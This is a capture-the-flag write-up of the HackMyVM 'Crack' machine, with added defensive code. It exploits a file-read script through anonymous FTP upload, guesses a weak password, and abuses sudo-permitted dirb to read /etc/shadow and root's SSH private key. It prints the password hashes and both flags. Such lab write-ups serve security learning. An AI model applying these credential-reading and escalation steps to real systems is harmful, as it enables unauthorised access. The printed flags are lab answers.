HackMyVM Crack
Information Gathering
┌──(kali㉿kali)-[~]
└─$ nmap -p0-65535 192.168.100.55
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-04 11:08 EDT
Nmap scan report for 192.168.100.55
Host is up (0.00038s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
4200/tcp open vrml-multi-use
12359/tcp open unknown
MAC Address: 08:00:27:90:73:E2 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 5.72 seconds
A more detailed scan of the open ports:
┌──(kali㉿kali)-[~]
└─$ nmap -p21,4200,12359 -sC -sV 192.168.100.55
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-04 11:12 EDT
Nmap scan report for 192.168.100.55
Host is up (0.00049s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.100.100
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 2 0 0 4096 Jun 07 2023 upload [NSE: writeable]
4200/tcp open ssl/http ShellInABox
|_http-title: Shell In A Box
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=crack
| Not valid before: 2023-06-07T10:20:13
|_Not valid after: 2043-06-02T10:20:13
12359/tcp open unknown
| fingerprint-strings:
| GenericLines:
| File to read:NOFile to read:
| NULL:
|_ File to read:
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port12359-TCP:V=7.95%I=7%D=5/4%Time=681783E9%P=x86_64-pc-linux-gnu%r(NU
SF:LL,D,"File\x20to\x20read:")%r(GenericLines,1C,"File\x20to\x20read:NOFil
SF:e\x20to\x20read:");
MAC Address: 08:00:27:90:73:E2 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.86 seconds
21: FTP allows anonymous access, and upload/ contains a crack.py
import os
import socket

s = socket.socket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
port = 12359
s.bind(('', port))
s.listen(50)

# Only one client connection is accepted; the loop below serves it
c, addr = s.accept()
no = "NO"
while True:
    try:
        c.send('File to read:'.encode())
        data = c.recv(1024)
        file = (str(data, 'utf-8').strip())
        # Only the basename of the requested path is looked up in upload/
        filename = os.path.basename(file)
        check = "/srv/ftp/upload/"+filename
        # Both the upload/ copy and the requested path must exist ...
        if os.path.isfile(check) and os.path.isfile(file):
            # ... but the file that is opened is the requested path
            f = open(file,"r")
            lines = f.readlines()
            lines = str(lines)
            lines = lines.encode()
            c.send(lines)
        else:
            c.send(no.encode())
    except ConnectionResetError:
        pass
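4200: a web page that provides a terminal
12359: connecting with nc returns "File to read:". This is the py script from the FTP share, and the script has some restrictions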
┌──(kali㉿kali)-[~]
└─$ nc 192.168.100.55 12359
File to read:/etc/passwd
NOFile to read:/etc/passwd
NOFile to read:
GetShell
file = (str(data, 'utf-8').strip())
filename = os.path.basename(file)
check = "/srv/ftp/upload/"+filename
if os.path.isfile(check) and os.path.isfile(file):
    f = open(file,"r")
    ...
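The script checks whether the file exists both in ftp/upload and at the path I entered, yet what it finally reads is the path I entered.
So this is simple: just upload into ftp/upload a file with the same name as the one I want to read (for example passwd for /etc/passwd), and it can be read.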
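The mismatch described above, shown next to a corrected check, as an added example that is not part of the original write-up or of crack.py. The function names and the temporary directory layout are assumptions made for the illustration; the fix is to open the same resolved path that was validated.

```python
import os
import tempfile

def vulnerable_pick(upload_dir, requested):
    """The check as crack.py does it: validate one path, open another."""
    check = os.path.join(upload_dir, os.path.basename(requested))
    if os.path.isfile(check) and os.path.isfile(requested):
        return requested              # the caller-supplied path gets opened
    return None

def hardened_pick(upload_dir, requested):
    """Resolve the name inside upload_dir and return that same path."""
    root = os.path.realpath(upload_dir)
    name = os.path.basename(requested)
    if name in ("", ".", ".."):
        return None
    candidate = os.path.realpath(os.path.join(root, name))
    # realpath follows symlinks, so a link inside upload_dir that points
    # elsewhere resolves outside root and is rejected here.
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate if os.path.isfile(candidate) else None

def demo():
    """Build a constructed layout and compare both checks."""
    with tempfile.TemporaryDirectory() as base:
        upload = os.path.join(base, "upload")     # stands in for /srv/ftp/upload
        private = os.path.join(base, "private")   # stands in for /etc
        os.mkdir(upload)
        os.mkdir(private)
        secret = os.path.join(private, "passwd")
        with open(secret, "w") as f:
            f.write("secret\n")
        open(os.path.join(upload, "passwd"), "w").close()   # empty same-name file
        os.symlink(secret, os.path.join(upload, "link"))    # link leaving upload/
        in_upload = os.path.realpath(os.path.join(upload, "passwd"))
        return {
            "vulnerable_returns_outside_path": vulnerable_pick(upload, secret) == secret,
            "hardened_stays_in_upload": hardened_pick(upload, secret) == in_upload,
            "hardened_symlink": hardened_pick(upload, "link"),
        }

if __name__ == "__main__":
    print(demo())
```
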
┌──(kali㉿kali)-[~]
└─$ lftp 192.168.100.55 -u Anonymous
密码:
lftp Anonymous@192.168.100.55:~> ls
drwxrwxrwx 2 0 0 4096 May 04 17:49 upload
lftp Anonymous@192.168.100.55:/> cd upload
lftp Anonymous@192.168.100.55:/upload> put passwd
lftp Anonymous@192.168.100.55:/upload> ls
-rwxr-xr-x 1 1000 1000 849 Jun 07 2023 crack.py
-rw------- 1 107 114 0 May 04 18:08 passwd
lftp Anonymous@192.168.100.55:/upload>
┌──(kali㉿kali)-[~]
└─$ nc 192.168.100.55 12359
File to read:/etc/passwd
['root:x:0:0:root:/root:/bin/bash\n', 'daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n', 'bin:x:2:2:bin:/bin:/usr/sbin/nologin\n', 'sys:x:3:3:sys:/dev:/usr/sbin/nologin\n', 'sync:x:4:65534:sync:/bin:/bin/sync\n', 'games:x:5:60:games:/usr/games:/usr/sbin/nologin\n', 'man:x:6:12:man:/var/cache/man:/usr/sbin/nologin\n', 'lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\n', 'mail:x:8:8:mail:/var/mail:/usr/sbin/nologin\n', 'news:x:9:9:news:/var/spool/news:/usr/sbin/nologin\n', 'uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\n', 'proxy:x:13:13:proxy:/bin:/usr/sbin/nologin\n', 'www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n', 'backup:x:34:34:backup:/var/backups:/usr/sbin/nologin\n', 'list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\n', 'irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin\n', 'gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\n', 'nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n', '_apt:x:100:65534::/nonexistent:/usr/sbin/nologin\n', 'systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin\n', 'systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin\n', 'messagebus:x:103:109::/nonexistent:/usr/sbin/nologin\n', 'systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin\n', 'sshd:x:105:65534::/run/sshd:/usr/sbin/nologin\n', 'cris:x:1000:1000:cris,,,:/home/cris:/bin/bash\n', 'systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin\n', 'shellinabox:x:106:112:Shell In A Box,,,:/var/lib/shellinabox:/usr/sbin/nologin\n', 'ftp:x:107:114:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin\n']
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
cris:x:1000:1000:cris,,,:/home/cris:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
shellinabox:x:106:112:Shell In A Box,,,:/var/lib/shellinabox:/usr/sbin/nologin
ftp:x:107:114:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
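The only user that can log in is cris.
For now I couldn't think of where the password might be, so I guessed it might be a weak password.
Going back to the web terminal on 4200 and trying to log in, I found that the password is simply cris.
The shell in the web page is laggy, I don't know why,
so I used socat to forward port 22 and connected over SSH.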
UserFlag
cris@crack:~$ id
uid=1000(cris) gid=1000(cris) grupos=1000(cris),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
cris@crack:~$ cat user.txt
eG4TUsTBxSFjTOPHMV
Root Privilege Escalation
cris@crack:~$ sudo -l
Matching Defaults entries for cris on crack:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User cris may run the following commands on crack:
(ALL) NOPASSWD: /usr/bin/dirb
sudo -l shows dirb, so it is obvious: this has to be an arbitrary file read.
cris@crack:~$ sudo dirb https://127.0.0.1:4200 /etc/shadow -v
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun May 4 18:28:50 2025
URL_BASE: https://127.0.0.1:4200/
WORDLIST_FILES: /etc/shadow
OPTION: Show Not Existent Pages
-----------------
GENERATED WORDS: 28
---- Scanning URL: https://127.0.0.1:4200/ ----
+ https://127.0.0.1:4200/root:$y$j9T$LVT9GIrLdk5L.xns1akJZ1$wmigJ7er07AT/VwIAuYSZ3j94LOCe8EJHC6d2mlZVo3:19515:0:99999:7::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/daemon:*:19515:0:99999:7::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/bin:*:19515:0:99999:7::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/sys:*:19515:0:99999:7::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/sync:*:19515:0:99999:7::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/games:*:19515:0:99999:7::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/man:*:19515:0:99999:7::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/lp:*:19515:0:99999:7::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/mail:*:19515:0:99999:7::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/news:*:19515:0:99999:7::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/uucp:*:19515:0:99999:7::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/proxy:*:19515:0:99999:7::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/www-data:*:19515:0:99999:7::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/backup:*:19515:0:99999:7::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/list:*:19515:0:99999:7::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/irc:*:19515:0:99999:7::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/gnats:*:19515:0:99999:7::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/nobody:*:19515:0:99999:7::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/_apt:*:19515:0:99999:7::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/systemd-network:*:19515:0:99999:7::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/systemd-resolve:*:19515:0:99999:7::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/messagebus:*:19515:0:99999:7::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/systemd-timesync:*:19515:0:99999:7::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/sshd:*:19515:0:99999:7::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/cris:$y$j9T$kFXVxpRhH2ZAeDGNazqRq/$IokBR4XhhyRJOur8YOHu3fF59/0NOHC5AIsvkxXx8..:19515:0:99999:7::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/systemd-coredump:!*:19515:::::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/shellinabox:*:19515:0:99999:7::: (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/ftp:*:19515:0:99999:7::: (CODE:404|SIZE:356)
-----------------
END_TIME: Sun May 4 18:28:50 2025
DOWNLOADED: 28 - FOUND: 0
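Specifying /etc/shadow as the wordlist is enough to leak its contents.
But john did not crack the root password.
Trying to read the root flag directly failed; root.txt was not found.
Then I tried reading the private key, and that worked.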
cris@crack:~$ sudo dirb https://127.0.0.1:4200 /root/.ssh/id_rsa -v
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun May 4 18:40:32 2025
URL_BASE: https://127.0.0.1:4200/
WORDLIST_FILES: /root/.ssh/id_rsa
OPTION: Show Not Existent Pages
-----------------
GENERATED WORDS: 38
---- Scanning URL: https://127.0.0.1:4200/ ----
+ https://127.0.0.1:4200/-----BEGIN (CODE:404|SIZE:356)
+ https://127.0.0.1:4200/-----END (CODE:404|SIZE:356)
-----------------
END_TIME: Sun May 4 18:40:32 2025
DOWNLOADED: 38 - FOUND: 1
After fixing up the format, the key can be used to log in directly.
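An audit of the `sudo -l` output shown earlier, as an added example that is not part of the original write-up. It flags rules like the dirb one, where a command runs as root with no argument restriction, so the caller picks every file the tool opens. The second rule in the sample is hypothetical and included only for contrast; `audit` and `RULE` are names chosen here.

```python
import re

# Constructed input: the rule line from the `sudo -l` output on this page,
# plus one argument-restricted rule (hypothetical) for contrast.
SUDO_L = """\
User cris may run the following commands on crack:
    (ALL) NOPASSWD: /usr/bin/dirb
    (root) /usr/bin/systemctl status ssh
"""

# "(runas) TAG: TAG: command[, command ...]"
RULE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z_]+:\s*)*)(.+)$")

def audit(sudo_l_output):
    """Return rules that run as root with no argument restriction."""
    findings = []
    for line in sudo_l_output.splitlines():
        m = RULE.match(line)
        if not m:
            continue                      # headers, Defaults, blank lines
        runas_user = m.group(1).split(":")[0].strip()
        tags = m.group(2).split()
        # Commands are comma-separated; escaped commas belong to arguments.
        for cmd in re.split(r"(?<!\\),\s*", m.group(3).strip()):
            path, _, args = cmd.partition(" ")
            # sudoers: a command listed without arguments may be run with
            # any arguments ('""' would mean "no arguments allowed").
            if args.strip() == "" and runas_user in ("ALL", "root"):
                findings.append({
                    "command": path,
                    "runas": runas_user,
                    "nopasswd": "NOPASSWD:" in tags,
                })
    return findings

if __name__ == "__main__":
    for finding in audit(SUDO_L):
        print(finding)
```
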
RootFlag
root@crack:~# id
uid=0(root) gid=0(root) grupos=0(root)
root@crack:~# cat root_fl4g.txt
wRt2xlFjcYqXXo4HMV
Summary
The difficulty is moderate, suitable for a noob like me.